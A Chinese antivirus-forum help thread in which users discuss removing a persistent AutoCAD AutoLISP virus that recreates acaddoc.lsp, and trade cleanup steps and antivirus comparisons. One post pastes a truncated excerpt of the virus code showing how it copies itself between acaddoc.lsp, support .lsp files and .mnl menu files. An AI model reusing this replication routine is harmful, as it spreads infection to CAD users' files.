瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 CAD老病毒 最新升级瑞星 还是杀不掉 求教高手

12   2  /  2  页   跳转

[求助] CAD老病毒 最新升级瑞星 还是杀不掉 求教高手

回复:CAD老病毒 最新升级瑞星 还是杀不掉 求教高手

CAD时间病毒还是别的啥的?楼主说说具体表现如何?
楼主全盘搜索搜的到acaddoc.lsp么?或者搜索*.lsp试试,尝试删除
~木~
gototop
 

回复:CAD老病毒 最新升级瑞星 还是杀不掉 求教高手

楼主你好,如果装机后仍然存在病毒应该怀疑是您的系统盘或者每次装机后运行的常用软件存在问题,建议选择可靠的操作系统并在重装系统后及时安装正版的杀毒软件升级以及对系统漏洞进行修复,安装常用软件时可以考虑去正规的大型网站进行下载。
gototop
 

回复:CAD老病毒 最新升级瑞星 还是杀不掉 求教高手

楼上同学 谢谢你们的关注 希望集大家的智慧能帮我解决问题(瑞星人员也可以)
1. acaddoc.lsp全盘搜过了 全部删除没用 还会继续生成
2.装机过了 而且是格式化后新装的 先装了瑞星升级后再装的软件
3.昨天又一次安全模式杀毒,只杀出来一只d盘的(奇怪昨天没杀出来,同一病毒,不同目录而已)
4. 个人感觉查找删除acaddoc.lsp非治标治本之法 原始病毒文件未找到
5.今天搜了下注册表 感觉里面已经被感染了
6. 该病毒的危害在于重装机没用 除非你不用cad了
gototop
 

回复:CAD老病毒 最新升级瑞星 还是杀不掉 求教高手

病毒表现为:打开cad后(每开文件也是)出现以下加载等,要反应很久,而且越来越多,估计是循环的。截取部分如下:
      (while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
  (progn
    (write-line text wjm1)
    );progn
  );if
);while
      (close wjm1)
      (close wjm)
      );progn
    );if
  );defun
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
  (progn
    (setq acaddocpath (vl-filename-directory dwgpath))
    (setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
    (setq mnln 0)
    (while (< mnln mnlnum)
      (setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
      (app mnlfilename acaddocfile bz)
      (app acaddocfile mnlfilename bz)
      (setq mnln (1+ mnln))
      );while
    (setq lspn 0)
    (while (< lspn lspnum)
      (setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
      (app lspfilename acaddocfile bz)
      (app acaddocfile lspfilename bz)
      (setq lspn (1+ lspn))
      );while
    );progn
  );if
(setq mnln 0)
(while (< mnln mnlnum)
  (setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
  (setq mnln1 0)
  (while (< mnln1 mnlnum)
    (setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
    (app mnlfilename mnlfilename1 bz)
    (setq mnln1 (1+ mnln1))
; 错误: 函数被取消
gototop
 

回复:CAD老病毒 最新升级瑞星 还是杀不掉 求教高手

我也遇到同样的问题了呀,瑞星居然不能杀CAD病毒,我家里的电脑上CAD病毒都久了。我办公室的电脑上用的是360杀毒软件,我试了试,能把CAD病毒杀了。瑞星不会比不过360杀毒了吧?我可是瑞星的老用户了哟!!!!!!
是不是有些让人失望哦!
gototop
 

回复:CAD老病毒 最新升级瑞星 还是杀不掉 求教高手

楼主查看C:盘目录下是否有boot.dat文件?有的话删.
在文件夹选项中打开显示隐藏文件和显示隐藏系统文件,然后查找acadapq.lsp,把找到的都删之。
然后把瑞星手动查杀设置中的未知脚本病毒勾上,把优化选项中的扩展库勾上再杀毒。
杀完后将acad.mnl属性改成只读,在建立个空的acaddoc.lsp把属性设为只读(很重要,不改可能重复感染)。
如果执行了以上操作还是老中毒的话,可能acad.mnl内有加载acaddoc.lsp的语句,找到删之。
看到楼主上传的日志,楼主使用的是AUTOCAD2004,acaddoc.lsp是AutoCAD2004每个图形打开时执行的例行程序,我原来也用过也感染过这个病毒,用瑞星就杀了。
最后,如果还不行可能是你的AUTOCAD2004安装包有问题,找个干净的重新下个吧!
最后编辑PauL922 最后编辑于 2010-09-28 21:11:57
gototop
 

回复: CAD老病毒 最新升级瑞星 还是杀不掉 求教高手

我的是AUTOCAD2007,纯净的ISO刻盘安装。昨天也中了这病毒,主要是生成楼主所说的文件,显示“输入的列表有缺陷”,打开图纸异常缓慢。打包上传,瑞星显示acad.vlx为病毒Trojan.Win32.ACAD.r,解决版本号为22.72.04.02。郁闷的是23.00.12.11竟然不报毒!
gototop
 

回复:CAD老病毒 最新升级瑞星 还是杀不掉 求教高手

CAD的病毒就是麻烦,原来染了N次,瑞星不带理的,然后别人就装了360,查杀了一部分出来,但根本没解决问题,最后换了小红伞查杀出来了一些,才好了。
gototop
 
12   2  /  2  页   跳转
页面顶部
Powered by Discuz!NT